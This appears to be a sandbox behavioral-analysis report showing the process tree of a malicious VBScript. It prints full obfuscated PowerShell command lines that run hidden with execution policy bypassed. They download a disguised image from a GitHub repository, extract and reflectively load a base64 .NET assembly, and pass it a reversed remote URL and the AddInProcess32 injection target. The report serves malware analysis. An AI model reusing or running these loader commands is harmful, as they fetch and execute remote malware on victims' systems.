
Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\mandayyyyxxxMPDW-constraints.vbs

    184
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCc5R3ppbWEnKydnZVVybCA9IGZ3aWh0dHBzOi8vcmEnKyd3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0EnKyduZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyBmd2k7OScrJ0d6d2ViQ2xpZW50ID0gTmV3LU9iamUnKydjdCBTeXN0ZW0uTmUnKyd0LldlYkNsaWVudDs5R3ppbWFnZUJ5dGVzID0gOUd6d2ViQ2xpZW4nKyd0LkRvdycrJ25sb2FkRGF0YSg5R3ppbWFnZVVybCk7OUd6aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbicrJ2coOUd6aW1hZ2VCeXRlcyk7OUd6c3RhcnRGbGFnID0gZndpPDxCQVNFNjRfU1RBUlQ+PmZ3aTs5R3plbmRGbGFnID0gZndpPDxCQVNFNjRfRU5EPj5md2k7OUd6c3RhcnRJbmRleCcrJyA9IDlHemltYWdlVGV4dC5JbmRleE9mKDlHenN0YXJ0RmxhZyk7OUd6ZW5kSW5kZXggPSA5R3ppbWFnZVRleHQuSW5kZXhPZig5R3plbmQnKydGbGFnKTs5R3pzdGFydCcrJ0luJysnZGV4IC1nZSAwIC1hbmQgOUd6ZW5kSScrJ25kZXggLWd0IDlHenN0YXJ0SW5kZXg7OUd6c3RhcnRJbmRleCArPSA5JysnR3pzdGFydEZsYWcuTGVuZ3RoOzlHemJhc2U2NExlbmd0aCA9IDlHemVuZEluZGV4IC0gOUd6c3RhcnRJbmRleDs5R3piYXNlNjRDb21tYW5kID0gOUd6aW1hZ2VUZXh0LlN1YnN0cmluZyg5R3pzdGFydEluZGV4LCA5R3piYXNlNjQnKydMZW5ndGgpOzlHemNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoOUd6YmFzZTY0Q29tbWFuZCk7OUd6bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDlHemNvJysnbW1hbmRCeXRlcyk7OUd6dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldCcrJ2hvZChmd2lWQUlmd2kpJysnOzlHenZhaU1ldGhvZC5JbnZva2UoOUd6bnVsbCwgQChmd2l0eHQuNDQ0NDZlc2FiYmJiYmJld21hZGFtLzQzMS44NzEuNjQuODkxLy86cHR0aGZ3aSwgZicrJ3dpZGVzYXRpdmFkb2Z3aSwgZncnKydpZGVzYXRpdmFkb2Z3aSwgZndpZGVzYXRpdmFkb2Z3aSwgZndpQWRkSW5Qcm9jZXNzMzJmd2ksIGZ3aWRlc2F0aXZhZG9md2ksIGZ3aWRlc2F0aXZhZG9md2kpKTsnKS5yRVBMQWNlKChbQ0hBcl0xMDIrW0NIQXJdMTE5K1tDSEFyXTEwNSksW1NUUmlOZ11bQ0hBcl0zOSkuckVQTEFjZSgnOUd6JyxbU1RSaU5nXVtDSEFyXTM2KSB8LigoR3YgJyptZHIqJykubkFtZVszLDExLDJdLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

      2084
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('9Gzima'+'geUrl = fwihttps://ra'+'w.githubusercontent.com/CryptersA'+'ndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg fwi;9'+'GzwebClient = New-Obje'+'ct System.Ne'+'t.WebClient;9GzimageBytes = 9GzwebClien'+'t.Dow'+'nloadData(9GzimageUrl);9GzimageText = [System.Text.Encoding]::UTF8.GetStrin'+'g(9GzimageBytes);9GzstartFlag = fwi<<BASE64_START>>fwi;9GzendFlag = fwi<<BASE64_END>>fwi;9GzstartIndex'+' = 9GzimageText.IndexOf(9GzstartFlag);9GzendIndex = 9GzimageText.IndexOf(9Gzend'+'Flag);9Gzstart'+'In'+'dex -ge 0 -and 9GzendI'+'ndex -gt 9GzstartIndex;9GzstartIndex += 9'+'GzstartFlag.Length;9Gzbase64Length = 9GzendIndex - 9GzstartIndex;9Gzbase64Command = 9GzimageText.Substring(9GzstartIndex, 9Gzbase64'+'Length);9GzcommandBytes = [System.Convert]::FromBase64String(9Gzbase64Command);9GzloadedAssembly = [System.Reflection.Assembly]::Load(9Gzco'+'mmandBytes);9GzvaiMethod = [dnlib.IO.Home].GetMet'+'hod(fwiVAIfwi)'+';9GzvaiMethod.Invoke(9Gznull, @(fwitxt.44446esabbbbbbewmadam/431.871.64.891//:ptthfwi, f'+'widesativadofwi, fw'+'idesativadofwi, fwidesativadofwi, fwiAddInProcess32fwi, fwidesativadofwi, fwidesativadofwi));').rEPLAce(([CHAr]102+[CHAr]119+[CHAr]105),[STRiNg][CHAr]39).rEPLAce('9Gz',[STRiNg][CHAr]36) |.((Gv '*mdr*').nAme[3,11,2]-joIn'')"

        2208

Process contents
